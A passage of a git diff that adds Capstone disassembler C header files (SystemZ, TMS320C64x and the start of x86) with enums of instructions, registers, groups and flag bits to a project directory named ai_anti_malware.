SYSZ_INS_LLGFR, + SYSZ_INS_LLGFRL, + SYSZ_INS_LLGH, + SYSZ_INS_LLGHR, + SYSZ_INS_LLGHRL, + SYSZ_INS_LLH, + SYSZ_INS_LLHH, + SYSZ_INS_LLHR, + SYSZ_INS_LLHRL, + SYSZ_INS_LLIHF, + SYSZ_INS_LLIHH, + SYSZ_INS_LLIHL, + SYSZ_INS_LLILF, + SYSZ_INS_LLILH, + SYSZ_INS_LLILL, + SYSZ_INS_LMG, + SYSZ_INS_LNDBR, + SYSZ_INS_LNEBR, + SYSZ_INS_LNGFR, + SYSZ_INS_LNGR, + SYSZ_INS_LNR, + SYSZ_INS_LNXBR, + SYSZ_INS_LPDBR, + SYSZ_INS_LPEBR, + SYSZ_INS_LPGFR, + SYSZ_INS_LPGR, + SYSZ_INS_LPR, + SYSZ_INS_LPXBR, + SYSZ_INS_LR, + SYSZ_INS_LRL, + SYSZ_INS_LRV, + SYSZ_INS_LRVG, + SYSZ_INS_LRVGR, + SYSZ_INS_LRVR, + SYSZ_INS_LT, + SYSZ_INS_LTDBR, + SYSZ_INS_LTEBR, + SYSZ_INS_LTG, + SYSZ_INS_LTGF, + SYSZ_INS_LTGFR, + SYSZ_INS_LTGR, + SYSZ_INS_LTR, + SYSZ_INS_LTXBR, + SYSZ_INS_LXDB, + SYSZ_INS_LXDBR, + SYSZ_INS_LXEB, + SYSZ_INS_LXEBR, + SYSZ_INS_LXR, + SYSZ_INS_LY, + SYSZ_INS_LZDR, + SYSZ_INS_LZER, + SYSZ_INS_LZXR, + SYSZ_INS_MADB, + SYSZ_INS_MADBR, + SYSZ_INS_MAEB, + SYSZ_INS_MAEBR, + SYSZ_INS_MDB, + SYSZ_INS_MDBR, + SYSZ_INS_MDEB, + SYSZ_INS_MDEBR, + SYSZ_INS_MEEB, + SYSZ_INS_MEEBR, + SYSZ_INS_MGHI, + SYSZ_INS_MH, + SYSZ_INS_MHI, + SYSZ_INS_MHY, + SYSZ_INS_MLG, + SYSZ_INS_MLGR, + SYSZ_INS_MS, + SYSZ_INS_MSDB, + SYSZ_INS_MSDBR, + SYSZ_INS_MSEB, + SYSZ_INS_MSEBR, + SYSZ_INS_MSFI, + SYSZ_INS_MSG, + SYSZ_INS_MSGF, + SYSZ_INS_MSGFI, + SYSZ_INS_MSGFR, + SYSZ_INS_MSGR, + SYSZ_INS_MSR, + SYSZ_INS_MSY, + SYSZ_INS_MVC, + SYSZ_INS_MVGHI, + SYSZ_INS_MVHHI, + SYSZ_INS_MVHI, + SYSZ_INS_MVI, + SYSZ_INS_MVIY, + SYSZ_INS_MVST, + SYSZ_INS_MXBR, + SYSZ_INS_MXDB, + SYSZ_INS_MXDBR, + SYSZ_INS_N, + SYSZ_INS_NC, + SYSZ_INS_NG, + SYSZ_INS_NGR, + SYSZ_INS_NGRK, + SYSZ_INS_NI, + SYSZ_INS_NIHF, + SYSZ_INS_NIHH, + SYSZ_INS_NIHL, + SYSZ_INS_NILF, + SYSZ_INS_NILH, + SYSZ_INS_NILL, + SYSZ_INS_NIY, + SYSZ_INS_NR, + SYSZ_INS_NRK, + SYSZ_INS_NY, + SYSZ_INS_O, + SYSZ_INS_OC, + SYSZ_INS_OG, + SYSZ_INS_OGR, + SYSZ_INS_OGRK, + SYSZ_INS_OI, + SYSZ_INS_OIHF, + SYSZ_INS_OIHH, + SYSZ_INS_OIHL, + SYSZ_INS_OILF, + SYSZ_INS_OILH, + SYSZ_INS_OILL, + SYSZ_INS_OIY, + SYSZ_INS_OR, + SYSZ_INS_ORK, + SYSZ_INS_OY, + SYSZ_INS_PFD, + SYSZ_INS_PFDRL, + SYSZ_INS_RISBG, + SYSZ_INS_RISBHG, + SYSZ_INS_RISBLG, + SYSZ_INS_RLL, + SYSZ_INS_RLLG, + SYSZ_INS_RNSBG, + SYSZ_INS_ROSBG, + SYSZ_INS_RXSBG, + SYSZ_INS_S, + SYSZ_INS_SDB, + SYSZ_INS_SDBR, + SYSZ_INS_SEB, + SYSZ_INS_SEBR, + SYSZ_INS_SG, + SYSZ_INS_SGF, + SYSZ_INS_SGFR, + SYSZ_INS_SGR, + SYSZ_INS_SGRK, + SYSZ_INS_SH, + SYSZ_INS_SHY, + SYSZ_INS_SL, + SYSZ_INS_SLB, + SYSZ_INS_SLBG, + SYSZ_INS_SLBR, + SYSZ_INS_SLFI, + SYSZ_INS_SLG, + SYSZ_INS_SLBGR, + SYSZ_INS_SLGF, + SYSZ_INS_SLGFI, + SYSZ_INS_SLGFR, + SYSZ_INS_SLGR, + SYSZ_INS_SLGRK, + SYSZ_INS_SLL, + SYSZ_INS_SLLG, + SYSZ_INS_SLLK, + SYSZ_INS_SLR, + SYSZ_INS_SLRK, + SYSZ_INS_SLY, + SYSZ_INS_SQDB, + SYSZ_INS_SQDBR, + SYSZ_INS_SQEB, + SYSZ_INS_SQEBR, + SYSZ_INS_SQXBR, + SYSZ_INS_SR, + SYSZ_INS_SRA, + SYSZ_INS_SRAG, + SYSZ_INS_SRAK, + SYSZ_INS_SRK, + SYSZ_INS_SRL, + SYSZ_INS_SRLG, + SYSZ_INS_SRLK, + SYSZ_INS_SRST, + SYSZ_INS_ST, + SYSZ_INS_STC, + SYSZ_INS_STCH, + SYSZ_INS_STCY, + SYSZ_INS_STD, + SYSZ_INS_STDY, + SYSZ_INS_STE, + SYSZ_INS_STEY, + SYSZ_INS_STFH, + SYSZ_INS_STG, + SYSZ_INS_STGRL, + SYSZ_INS_STH, + SYSZ_INS_STHH, + SYSZ_INS_STHRL, + SYSZ_INS_STHY, + SYSZ_INS_STMG, + SYSZ_INS_STRL, + SYSZ_INS_STRV, + SYSZ_INS_STRVG, + SYSZ_INS_STY, + SYSZ_INS_SXBR, + SYSZ_INS_SY, + SYSZ_INS_TM, + SYSZ_INS_TMHH, + SYSZ_INS_TMHL, + SYSZ_INS_TMLH, + SYSZ_INS_TMLL, + SYSZ_INS_TMY, + SYSZ_INS_X, + SYSZ_INS_XC, + SYSZ_INS_XG, + SYSZ_INS_XGR, + SYSZ_INS_XGRK, + SYSZ_INS_XI, + SYSZ_INS_XIHF, + SYSZ_INS_XILF, + SYSZ_INS_XIY, + SYSZ_INS_XR, + SYSZ_INS_XRK, + SYSZ_INS_XY, + + SYSZ_INS_ENDING, // <-- mark the end of the list of instructions +} sysz_insn; + +/// Group of SystemZ instructions +typedef enum sysz_insn_group { + SYSZ_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + // Generic groups + // all jump instructions (conditional+direct+indirect jumps) + SYSZ_GRP_JUMP, ///< = CS_GRP_JUMP + + // Architecture-specific groups + SYSZ_GRP_DISTINCTOPS = 128, + SYSZ_GRP_FPEXTENSION, + SYSZ_GRP_HIGHWORD, + SYSZ_GRP_INTERLOCKEDACCESS1, + SYSZ_GRP_LOADSTOREONCOND, + + SYSZ_GRP_ENDING, // <-- mark the end of the list of groups +} sysz_insn_group; + +#ifdef __cplusplus +} +#endif + +#endif diff --git a/ai_anti_malware/capstone/include/capstone/tms320c64x.h b/ai_anti_malware/capstone/include/capstone/tms320c64x.h new file mode 100644 index 0000000..5e7f1b3 --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/tms320c64x.h @@ -0,0 +1,359 @@ +/* Capstone Disassembly Engine */ +/* TMS320C64x Backend by Fotis Loukos 2016 */ + +#ifndef CAPSTONE_TMS320C64X_H +#define CAPSTONE_TMS320C64X_H + +#ifdef __cplusplus +extern "C" { +#endif + +#include +#include "platform.h" + +#ifdef _MSC_VER +#pragma warning(disable:4201) +#endif + +typedef enum tms320c64x_op_type { + TMS320C64X_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + TMS320C64X_OP_REG, ///< = CS_OP_REG (Register operand). + TMS320C64X_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + TMS320C64X_OP_MEM, ///< = CS_OP_MEM (Memory operand). + TMS320C64X_OP_REGPAIR = 64, ///< Register pair for double word ops +} tms320c64x_op_type; + +typedef enum tms320c64x_mem_disp { + TMS320C64X_MEM_DISP_INVALID = 0, + TMS320C64X_MEM_DISP_CONSTANT, + TMS320C64X_MEM_DISP_REGISTER, +} tms320c64x_mem_disp; + +typedef enum tms320c64x_mem_dir { + TMS320C64X_MEM_DIR_INVALID = 0, + TMS320C64X_MEM_DIR_FW, + TMS320C64X_MEM_DIR_BW, +} tms320c64x_mem_dir; + +typedef enum tms320c64x_mem_mod { + TMS320C64X_MEM_MOD_INVALID = 0, + TMS320C64X_MEM_MOD_NO, + TMS320C64X_MEM_MOD_PRE, + TMS320C64X_MEM_MOD_POST, +} tms320c64x_mem_mod; + +typedef struct tms320c64x_op_mem { + unsigned int base; ///< base register + unsigned int disp; ///< displacement/offset value + unsigned int unit; ///< unit of base and offset register + unsigned int scaled; ///< offset scaled + unsigned int disptype; ///< displacement type + unsigned int direction; ///< direction + unsigned int modify; ///< modification +} tms320c64x_op_mem; + +typedef struct cs_tms320c64x_op { + tms320c64x_op_type type; ///< operand type + union { + unsigned int reg; ///< register value for REG operand or first register for REGPAIR operand + int32_t imm; ///< immediate value for IMM operand + tms320c64x_op_mem mem; ///< base/disp value for MEM operand + }; +} cs_tms320c64x_op; + +typedef struct cs_tms320c64x { + uint8_t op_count; + cs_tms320c64x_op operands[8]; ///< operands for this instruction. + struct { + unsigned int reg; + unsigned int zero; + } condition; + struct { + unsigned int unit; + unsigned int side; + unsigned int crosspath; + } funit; + unsigned int parallel; +} cs_tms320c64x; + +typedef enum tms320c64x_reg { + TMS320C64X_REG_INVALID = 0, + + TMS320C64X_REG_AMR, + TMS320C64X_REG_CSR, + TMS320C64X_REG_DIER, + TMS320C64X_REG_DNUM, + TMS320C64X_REG_ECR, + TMS320C64X_REG_GFPGFR, + TMS320C64X_REG_GPLYA, + TMS320C64X_REG_GPLYB, + TMS320C64X_REG_ICR, + TMS320C64X_REG_IER, + TMS320C64X_REG_IERR, + TMS320C64X_REG_ILC, + TMS320C64X_REG_IRP, + TMS320C64X_REG_ISR, + TMS320C64X_REG_ISTP, + TMS320C64X_REG_ITSR, + TMS320C64X_REG_NRP, + TMS320C64X_REG_NTSR, + TMS320C64X_REG_REP, + TMS320C64X_REG_RILC, + TMS320C64X_REG_SSR, + TMS320C64X_REG_TSCH, + TMS320C64X_REG_TSCL, + TMS320C64X_REG_TSR, + TMS320C64X_REG_A0, + TMS320C64X_REG_A1, + TMS320C64X_REG_A2, + TMS320C64X_REG_A3, + TMS320C64X_REG_A4, + TMS320C64X_REG_A5, + TMS320C64X_REG_A6, + TMS320C64X_REG_A7, + TMS320C64X_REG_A8, + TMS320C64X_REG_A9, + TMS320C64X_REG_A10, + TMS320C64X_REG_A11, + TMS320C64X_REG_A12, + TMS320C64X_REG_A13, + TMS320C64X_REG_A14, + TMS320C64X_REG_A15, + TMS320C64X_REG_A16, + TMS320C64X_REG_A17, + TMS320C64X_REG_A18, + TMS320C64X_REG_A19, + TMS320C64X_REG_A20, + TMS320C64X_REG_A21, + TMS320C64X_REG_A22, + TMS320C64X_REG_A23, + TMS320C64X_REG_A24, + TMS320C64X_REG_A25, + TMS320C64X_REG_A26, + TMS320C64X_REG_A27, + TMS320C64X_REG_A28, + TMS320C64X_REG_A29, + TMS320C64X_REG_A30, + TMS320C64X_REG_A31, + TMS320C64X_REG_B0, + TMS320C64X_REG_B1, + TMS320C64X_REG_B2, + TMS320C64X_REG_B3, + TMS320C64X_REG_B4, + TMS320C64X_REG_B5, + TMS320C64X_REG_B6, + TMS320C64X_REG_B7, + TMS320C64X_REG_B8, + TMS320C64X_REG_B9, + TMS320C64X_REG_B10, + TMS320C64X_REG_B11, + TMS320C64X_REG_B12, + TMS320C64X_REG_B13, + TMS320C64X_REG_B14, + TMS320C64X_REG_B15, + TMS320C64X_REG_B16, + TMS320C64X_REG_B17, + TMS320C64X_REG_B18, + TMS320C64X_REG_B19, + TMS320C64X_REG_B20, + TMS320C64X_REG_B21, + TMS320C64X_REG_B22, + TMS320C64X_REG_B23, + TMS320C64X_REG_B24, + TMS320C64X_REG_B25, + TMS320C64X_REG_B26, + TMS320C64X_REG_B27, + TMS320C64X_REG_B28, + TMS320C64X_REG_B29, + TMS320C64X_REG_B30, + TMS320C64X_REG_B31, + TMS320C64X_REG_PCE1, + + TMS320C64X_REG_ENDING, // <-- mark the end of the list of registers + + // Alias registers + TMS320C64X_REG_EFR = TMS320C64X_REG_ECR, + TMS320C64X_REG_IFR = TMS320C64X_REG_ISR, +} tms320c64x_reg; + +typedef enum tms320c64x_insn { + TMS320C64X_INS_INVALID = 0, + + TMS320C64X_INS_ABS, + TMS320C64X_INS_ABS2, + TMS320C64X_INS_ADD, + TMS320C64X_INS_ADD2, + TMS320C64X_INS_ADD4, + TMS320C64X_INS_ADDAB, + TMS320C64X_INS_ADDAD, + TMS320C64X_INS_ADDAH, + TMS320C64X_INS_ADDAW, + TMS320C64X_INS_ADDK, + TMS320C64X_INS_ADDKPC, + TMS320C64X_INS_ADDU, + TMS320C64X_INS_AND, + TMS320C64X_INS_ANDN, + TMS320C64X_INS_AVG2, + TMS320C64X_INS_AVGU4, + TMS320C64X_INS_B, + TMS320C64X_INS_BDEC, + TMS320C64X_INS_BITC4, + TMS320C64X_INS_BNOP, + TMS320C64X_INS_BPOS, + TMS320C64X_INS_CLR, + TMS320C64X_INS_CMPEQ, + TMS320C64X_INS_CMPEQ2, + TMS320C64X_INS_CMPEQ4, + TMS320C64X_INS_CMPGT, + TMS320C64X_INS_CMPGT2, + TMS320C64X_INS_CMPGTU4, + TMS320C64X_INS_CMPLT, + TMS320C64X_INS_CMPLTU, + TMS320C64X_INS_DEAL, + TMS320C64X_INS_DOTP2, + TMS320C64X_INS_DOTPN2, + TMS320C64X_INS_DOTPNRSU2, + TMS320C64X_INS_DOTPRSU2, + TMS320C64X_INS_DOTPSU4, + TMS320C64X_INS_DOTPU4, + TMS320C64X_INS_EXT, + TMS320C64X_INS_EXTU, + TMS320C64X_INS_GMPGTU, + TMS320C64X_INS_GMPY4, + TMS320C64X_INS_LDB, + TMS320C64X_INS_LDBU, + TMS320C64X_INS_LDDW, + TMS320C64X_INS_LDH, + TMS320C64X_INS_LDHU, + TMS320C64X_INS_LDNDW, + TMS320C64X_INS_LDNW, + TMS320C64X_INS_LDW, + TMS320C64X_INS_LMBD, + TMS320C64X_INS_MAX2, + TMS320C64X_INS_MAXU4, + TMS320C64X_INS_MIN2, + TMS320C64X_INS_MINU4, + TMS320C64X_INS_MPY, + TMS320C64X_INS_MPY2, + TMS320C64X_INS_MPYH, + TMS320C64X_INS_MPYHI, + TMS320C64X_INS_MPYHIR, + TMS320C64X_INS_MPYHL, + TMS320C64X_INS_MPYHLU, + TMS320C64X_INS_MPYHSLU, + TMS320C64X_INS_MPYHSU, + TMS320C64X_INS_MPYHU, + TMS320C64X_INS_MPYHULS, + TMS320C64X_INS_MPYHUS, + TMS320C64X_INS_MPYLH, + TMS320C64X_INS_MPYLHU, + TMS320C64X_INS_MPYLI, + TMS320C64X_INS_MPYLIR, + TMS320C64X_INS_MPYLSHU, + TMS320C64X_INS_MPYLUHS, + TMS320C64X_INS_MPYSU, + TMS320C64X_INS_MPYSU4, + TMS320C64X_INS_MPYU, + TMS320C64X_INS_MPYU4, + TMS320C64X_INS_MPYUS, + TMS320C64X_INS_MVC, + TMS320C64X_INS_MVD, + TMS320C64X_INS_MVK, + TMS320C64X_INS_MVKL, + TMS320C64X_INS_MVKLH, + TMS320C64X_INS_NOP, + TMS320C64X_INS_NORM, + TMS320C64X_INS_OR, + TMS320C64X_INS_PACK2, + TMS320C64X_INS_PACKH2, + TMS320C64X_INS_PACKH4, + TMS320C64X_INS_PACKHL2, + TMS320C64X_INS_PACKL4, + TMS320C64X_INS_PACKLH2, + TMS320C64X_INS_ROTL, + TMS320C64X_INS_SADD, + TMS320C64X_INS_SADD2, + TMS320C64X_INS_SADDU4, + TMS320C64X_INS_SADDUS2, + TMS320C64X_INS_SAT, + TMS320C64X_INS_SET, + TMS320C64X_INS_SHFL, + TMS320C64X_INS_SHL, + TMS320C64X_INS_SHLMB, + TMS320C64X_INS_SHR, + TMS320C64X_INS_SHR2, + TMS320C64X_INS_SHRMB, + TMS320C64X_INS_SHRU, + TMS320C64X_INS_SHRU2, + TMS320C64X_INS_SMPY, + TMS320C64X_INS_SMPY2, + TMS320C64X_INS_SMPYH, + TMS320C64X_INS_SMPYHL, + TMS320C64X_INS_SMPYLH, + TMS320C64X_INS_SPACK2, + TMS320C64X_INS_SPACKU4, + TMS320C64X_INS_SSHL, + TMS320C64X_INS_SSHVL, + TMS320C64X_INS_SSHVR, + TMS320C64X_INS_SSUB, + TMS320C64X_INS_STB, + TMS320C64X_INS_STDW, + TMS320C64X_INS_STH, + TMS320C64X_INS_STNDW, + TMS320C64X_INS_STNW, + TMS320C64X_INS_STW, + TMS320C64X_INS_SUB, + TMS320C64X_INS_SUB2, + TMS320C64X_INS_SUB4, + TMS320C64X_INS_SUBAB, + TMS320C64X_INS_SUBABS4, + TMS320C64X_INS_SUBAH, + TMS320C64X_INS_SUBAW, + TMS320C64X_INS_SUBC, + TMS320C64X_INS_SUBU, + TMS320C64X_INS_SWAP4, + TMS320C64X_INS_UNPKHU4, + TMS320C64X_INS_UNPKLU4, + TMS320C64X_INS_XOR, + TMS320C64X_INS_XPND2, + TMS320C64X_INS_XPND4, + // Aliases + TMS320C64X_INS_IDLE, + TMS320C64X_INS_MV, + TMS320C64X_INS_NEG, + TMS320C64X_INS_NOT, + TMS320C64X_INS_SWAP2, + TMS320C64X_INS_ZERO, + + TMS320C64X_INS_ENDING, // <-- mark the end of the list of instructions +} tms320c64x_insn; + +typedef enum tms320c64x_insn_group { + TMS320C64X_GRP_INVALID = 0, ///< = CS_GRP_INVALID + + TMS320C64X_GRP_JUMP, ///< = CS_GRP_JUMP + + TMS320C64X_GRP_FUNIT_D = 128, + TMS320C64X_GRP_FUNIT_L, + TMS320C64X_GRP_FUNIT_M, + TMS320C64X_GRP_FUNIT_S, + TMS320C64X_GRP_FUNIT_NO, + + TMS320C64X_GRP_ENDING, // <-- mark the end of the list of groups +} tms320c64x_insn_group; + +typedef enum tms320c64x_funit { + TMS320C64X_FUNIT_INVALID = 0, + TMS320C64X_FUNIT_D, + TMS320C64X_FUNIT_L, + TMS320C64X_FUNIT_M, + TMS320C64X_FUNIT_S, + TMS320C64X_FUNIT_NO +} tms320c64x_funit; + +#ifdef __cplusplus +} +#endif + +#endif + diff --git a/ai_anti_malware/capstone/include/capstone/x86.h b/ai_anti_malware/capstone/include/capstone/x86.h new file mode 100644 index 0000000..f8fc09e --- /dev/null +++ b/ai_anti_malware/capstone/include/capstone/x86.h @@ -0,0 +1,1972 @@ +#ifndef CAPSTONE_X86_H +#define CAPSTONE_X86_H + +/* Capstone Disassembly Engine */ +/* By Nguyen Anh Quynh , 2013-2015 */ + +#ifdef __cplusplus +extern "C" { +#endif + +#include "platform.h" + +/// Calculate relative address for X86-64, given cs_insn structure +#define X86_REL_ADDR(insn) (((insn).detail->x86.operands[0].type == X86_OP_IMM) \ + ? (uint64_t)((insn).detail->x86.operands[0].imm) \ + : (((insn).address + (insn).size) + (uint64_t)(insn).detail->x86.disp)) + +/// X86 registers +typedef enum x86_reg { + X86_REG_INVALID = 0, + X86_REG_AH, X86_REG_AL, X86_REG_AX, X86_REG_BH, X86_REG_BL, + X86_REG_BP, X86_REG_BPL, X86_REG_BX, X86_REG_CH, X86_REG_CL, + X86_REG_CS, X86_REG_CX, X86_REG_DH, X86_REG_DI, X86_REG_DIL, + X86_REG_DL, X86_REG_DS, X86_REG_DX, X86_REG_EAX, X86_REG_EBP, + X86_REG_EBX, X86_REG_ECX, X86_REG_EDI, X86_REG_EDX, X86_REG_EFLAGS, + X86_REG_EIP, X86_REG_EIZ, X86_REG_ES, X86_REG_ESI, X86_REG_ESP, + X86_REG_FPSW, X86_REG_FS, X86_REG_GS, X86_REG_IP, X86_REG_RAX, + X86_REG_RBP, X86_REG_RBX, X86_REG_RCX, X86_REG_RDI, X86_REG_RDX, + X86_REG_RIP, X86_REG_RIZ, X86_REG_RSI, X86_REG_RSP, X86_REG_SI, + X86_REG_SIL, X86_REG_SP, X86_REG_SPL, X86_REG_SS, X86_REG_CR0, + X86_REG_CR1, X86_REG_CR2, X86_REG_CR3, X86_REG_CR4, X86_REG_CR5, + X86_REG_CR6, X86_REG_CR7, X86_REG_CR8, X86_REG_CR9, X86_REG_CR10, + X86_REG_CR11, X86_REG_CR12, X86_REG_CR13, X86_REG_CR14, X86_REG_CR15, + X86_REG_DR0, X86_REG_DR1, X86_REG_DR2, X86_REG_DR3, X86_REG_DR4, + X86_REG_DR5, X86_REG_DR6, X86_REG_DR7, X86_REG_DR8, X86_REG_DR9, + X86_REG_DR10, X86_REG_DR11, X86_REG_DR12, X86_REG_DR13, X86_REG_DR14, + X86_REG_DR15, X86_REG_FP0, X86_REG_FP1, X86_REG_FP2, X86_REG_FP3, + X86_REG_FP4, X86_REG_FP5, X86_REG_FP6, X86_REG_FP7, + X86_REG_K0, X86_REG_K1, X86_REG_K2, X86_REG_K3, X86_REG_K4, + X86_REG_K5, X86_REG_K6, X86_REG_K7, X86_REG_MM0, X86_REG_MM1, + X86_REG_MM2, X86_REG_MM3, X86_REG_MM4, X86_REG_MM5, X86_REG_MM6, + X86_REG_MM7, X86_REG_R8, X86_REG_R9, X86_REG_R10, X86_REG_R11, + X86_REG_R12, X86_REG_R13, X86_REG_R14, X86_REG_R15, + X86_REG_ST0, X86_REG_ST1, X86_REG_ST2, X86_REG_ST3, + X86_REG_ST4, X86_REG_ST5, X86_REG_ST6, X86_REG_ST7, + X86_REG_XMM0, X86_REG_XMM1, X86_REG_XMM2, X86_REG_XMM3, X86_REG_XMM4, + X86_REG_XMM5, X86_REG_XMM6, X86_REG_XMM7, X86_REG_XMM8, X86_REG_XMM9, + X86_REG_XMM10, X86_REG_XMM11, X86_REG_XMM12, X86_REG_XMM13, X86_REG_XMM14, + X86_REG_XMM15, X86_REG_XMM16, X86_REG_XMM17, X86_REG_XMM18, X86_REG_XMM19, + X86_REG_XMM20, X86_REG_XMM21, X86_REG_XMM22, X86_REG_XMM23, X86_REG_XMM24, + X86_REG_XMM25, X86_REG_XMM26, X86_REG_XMM27, X86_REG_XMM28, X86_REG_XMM29, + X86_REG_XMM30, X86_REG_XMM31, X86_REG_YMM0, X86_REG_YMM1, X86_REG_YMM2, + X86_REG_YMM3, X86_REG_YMM4, X86_REG_YMM5, X86_REG_YMM6, X86_REG_YMM7, + X86_REG_YMM8, X86_REG_YMM9, X86_REG_YMM10, X86_REG_YMM11, X86_REG_YMM12, + X86_REG_YMM13, X86_REG_YMM14, X86_REG_YMM15, X86_REG_YMM16, X86_REG_YMM17, + X86_REG_YMM18, X86_REG_YMM19, X86_REG_YMM20, X86_REG_YMM21, X86_REG_YMM22, + X86_REG_YMM23, X86_REG_YMM24, X86_REG_YMM25, X86_REG_YMM26, X86_REG_YMM27, + X86_REG_YMM28, X86_REG_YMM29, X86_REG_YMM30, X86_REG_YMM31, X86_REG_ZMM0, + X86_REG_ZMM1, X86_REG_ZMM2, X86_REG_ZMM3, X86_REG_ZMM4, X86_REG_ZMM5, + X86_REG_ZMM6, X86_REG_ZMM7, X86_REG_ZMM8, X86_REG_ZMM9, X86_REG_ZMM10, + X86_REG_ZMM11, X86_REG_ZMM12, X86_REG_ZMM13, X86_REG_ZMM14, X86_REG_ZMM15, + X86_REG_ZMM16, X86_REG_ZMM17, X86_REG_ZMM18, X86_REG_ZMM19, X86_REG_ZMM20, + X86_REG_ZMM21, X86_REG_ZMM22, X86_REG_ZMM23, X86_REG_ZMM24, X86_REG_ZMM25, + X86_REG_ZMM26, X86_REG_ZMM27, X86_REG_ZMM28, X86_REG_ZMM29, X86_REG_ZMM30, + X86_REG_ZMM31, X86_REG_R8B, X86_REG_R9B, X86_REG_R10B, X86_REG_R11B, + X86_REG_R12B, X86_REG_R13B, X86_REG_R14B, X86_REG_R15B, X86_REG_R8D, + X86_REG_R9D, X86_REG_R10D, X86_REG_R11D, X86_REG_R12D, X86_REG_R13D, + X86_REG_R14D, X86_REG_R15D, X86_REG_R8W, X86_REG_R9W, X86_REG_R10W, + X86_REG_R11W, X86_REG_R12W, X86_REG_R13W, X86_REG_R14W, X86_REG_R15W, + + X86_REG_ENDING // <-- mark the end of the list of registers +} x86_reg; + +// Sub-flags of EFLAGS +#define X86_EFLAGS_MODIFY_AF (1ULL << 0) +#define X86_EFLAGS_MODIFY_CF (1ULL << 1) +#define X86_EFLAGS_MODIFY_SF (1ULL << 2) +#define X86_EFLAGS_MODIFY_ZF (1ULL << 3) +#define X86_EFLAGS_MODIFY_PF (1ULL << 4) +#define X86_EFLAGS_MODIFY_OF (1ULL << 5) +#define X86_EFLAGS_MODIFY_TF (1ULL << 6) +#define X86_EFLAGS_MODIFY_IF (1ULL << 7) +#define X86_EFLAGS_MODIFY_DF (1ULL << 8) +#define X86_EFLAGS_MODIFY_NT (1ULL << 9) +#define X86_EFLAGS_MODIFY_RF (1ULL << 10) +#define X86_EFLAGS_PRIOR_OF (1ULL << 11) +#define X86_EFLAGS_PRIOR_SF (1ULL << 12) +#define X86_EFLAGS_PRIOR_ZF (1ULL << 13) +#define X86_EFLAGS_PRIOR_AF (1ULL << 14) +#define X86_EFLAGS_PRIOR_PF (1ULL << 15) +#define X86_EFLAGS_PRIOR_CF (1ULL << 16) +#define X86_EFLAGS_PRIOR_TF (1ULL << 17) +#define X86_EFLAGS_PRIOR_IF (1ULL << 18) +#define X86_EFLAGS_PRIOR_DF (1ULL << 19) +#define X86_EFLAGS_PRIOR_NT (1ULL << 20) +#define X86_EFLAGS_RESET_OF (1ULL << 21) +#define X86_EFLAGS_RESET_CF (1ULL << 22) +#define X86_EFLAGS_RESET_DF (1ULL << 23) +#define X86_EFLAGS_RESET_IF (1ULL << 24) +#define X86_EFLAGS_RESET_SF (1ULL << 25) +#define X86_EFLAGS_RESET_AF (1ULL << 26) +#define X86_EFLAGS_RESET_TF (1ULL << 27) +#define X86_EFLAGS_RESET_NT (1ULL << 28) +#define X86_EFLAGS_RESET_PF (1ULL << 29) +#define X86_EFLAGS_SET_CF (1ULL << 30) +#define X86_EFLAGS_SET_DF (1ULL << 31) +#define X86_EFLAGS_SET_IF (1ULL << 32) +#define X86_EFLAGS_TEST_OF (1ULL << 33) +#define X86_EFLAGS_TEST_SF (1ULL << 34) +#define X86_EFLAGS_TEST_ZF (1ULL << 35) +#define X86_EFLAGS_TEST_PF (1ULL << 36) +#define X86_EFLAGS_TEST_CF (1ULL << 37) +#define X86_EFLAGS_TEST_NT (1ULL << 38) +#define X86_EFLAGS_TEST_DF (1ULL << 39) +#define X86_EFLAGS_UNDEFINED_OF (1ULL << 40) +#define X86_EFLAGS_UNDEFINED_SF (1ULL << 41) +#define X86_EFLAGS_UNDEFINED_ZF (1ULL << 42) +#define X86_EFLAGS_UNDEFINED_PF (1ULL << 43) +#define X86_EFLAGS_UNDEFINED_AF (1ULL << 44) +#define X86_EFLAGS_UNDEFINED_CF (1ULL << 45) +#define X86_EFLAGS_RESET_RF (1ULL << 46) +#define X86_EFLAGS_TEST_RF (1ULL << 47) +#define X86_EFLAGS_TEST_IF (1ULL << 48) +#define X86_EFLAGS_TEST_TF (1ULL << 49) +#define X86_EFLAGS_TEST_AF (1ULL << 50) +#define X86_EFLAGS_RESET_ZF (1ULL << 51) +#define X86_EFLAGS_SET_OF (1ULL << 52) +#define X86_EFLAGS_SET_SF (1ULL << 53) +#define X86_EFLAGS_SET_ZF (1ULL << 54) +#define X86_EFLAGS_SET_AF (1ULL << 55) +#define X86_EFLAGS_SET_PF (1ULL << 56) +#define X86_EFLAGS_RESET_0F (1ULL << 57) +#define X86_EFLAGS_RESET_AC (1ULL << 58) + +#define X86_FPU_FLAGS_MODIFY_C0 (1ULL << 0) +#define X86_FPU_FLAGS_MODIFY_C1 (1ULL << 1) +#define X86_FPU_FLAGS_MODIFY_C2 (1ULL << 2) +#define X86_FPU_FLAGS_MODIFY_C3 (1ULL << 3) +#define X86_FPU_FLAGS_RESET_C0 (1ULL << 4) +#define X86_FPU_FLAGS_RESET_C1 (1ULL << 5) +#define X86_FPU_FLAGS_RESET_C2 (1ULL << 6) +#define X86_FPU_FLAGS_RESET_C3 (1ULL << 7) +#define X86_FPU_FLAGS_SET_C0 (1ULL << 8) +#define X86_FPU_FLAGS_SET_C1 (1ULL << 9) +#define X86_FPU_FLAGS_SET_C2 (1ULL << 10) +#define X86_FPU_FLAGS_SET_C3 (1ULL << 11) +#define X86_FPU_FLAGS_UNDEFINED_C0 (1ULL << 12) +#define X86_FPU_FLAGS_UNDEFINED_C1 (1ULL << 13) +#define X86_FPU_FLAGS_UNDEFINED_C2 (1ULL << 14) +#define X86_FPU_FLAGS_UNDEFINED_C3 (1ULL << 15) +#define X86_FPU_FLAGS_TEST_C0 (1ULL << 16) +#define X86_FPU_FLAGS_TEST_C1 (1ULL << 17) +#define X86_FPU_FLAGS_TEST_C2 (1ULL << 18) +#define X86_FPU_FLAGS_TEST_C3 (1ULL << 19) + + +/// Operand type for instruction's operands +typedef enum x86_op_type { + X86_OP_INVALID = 0, ///< = CS_OP_INVALID (Uninitialized). + X86_OP_REG, ///< = CS_OP_REG (Register operand). + X86_OP_IMM, ///< = CS_OP_IMM (Immediate operand). + X86_OP_MEM, ///< = CS_OP_MEM (Memory operand). +} x86_op_type; + +/// XOP Code Condition type +typedef enum x86_xop_cc { + X86_XOP_CC_INVALID = 0, ///< Uninitialized. + X86_XOP_CC_LT, + X86_XOP_CC_LE, + X86_XOP_CC_GT, + 